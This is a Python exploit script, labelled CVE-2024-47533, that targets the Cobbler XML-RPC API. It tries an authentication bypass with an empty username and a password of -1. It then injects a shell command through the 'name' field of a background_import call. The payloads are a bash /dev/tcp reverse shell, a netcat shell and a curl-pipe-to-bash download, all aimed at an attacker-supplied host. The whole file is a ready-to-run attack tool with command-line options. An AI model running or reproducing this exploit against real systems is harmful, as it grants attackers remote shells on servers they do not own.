#!/usr/bin/env python3
import ssl
import xmlrpc.client
import argparse

def exploit(target, lhost, lport, payload_type):
    payloads = {
        "bash": f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'",
        "nc": f"nc -e /bin/bash {lhost} {lport}",
        "curl": f"curl http://{lhost}/rev.sh | bash"
    }

    payload = payloads.get(payload_type, payloads)

    print(f"[*] Target: {target}")
    print(f"[*] Listener: {lhost}:{lport}")
    print(f"[*] Payload type: {payload_type}")

    try:
        conn = xmlrpc.client.ServerProxy(
            target,
            context=ssl._create_unverified_context(),
            allow_none=True
        )

        print("[*] Trying to authenticate...")
        try:
            token = conn.login("", -1)
            print("[+] Login success!")
        except:
            token = None
            print("[-] Login bypass (anonymous)")

        import_data = {
            "path": "~/tmp",
            "name": f"$({payload})"
        }

        print("[*] Sending exploit...")
        if token:
            result = conn.background_import(import_data, token)
        else:
            result = conn.background_import(import_data)

        print("[+] Exploit sent. Check your listener (nc -lvnp PORT)")
        return True

    except Exception as e:
        print(f"[-] Exploit failed: {e}")
        return False

def main():
    parser = argparse.ArgumentParser(description="CVE-2024-47533 - Cobbler RCE")
    parser.add_argument('-t', '--target', required=True, help='Target URL (e.g., https://127.0.0.1:25151/cobbler_api)')
    parser.add_argument('-l', '--lhost', required=True, help='Your IP for reverse shell')
    parser.add_argument('-p', '--lport', required=True, type=int, help='Your port for reverse shell')
    parser.add_argument('--payload', choices=['bash', 'nc', 'curl'], help='Payload type')

    args = parser.parse_args()
    exploit(args.target, args.lhost, args.lport, args.payload)


if __name__ == "__main__":
    main()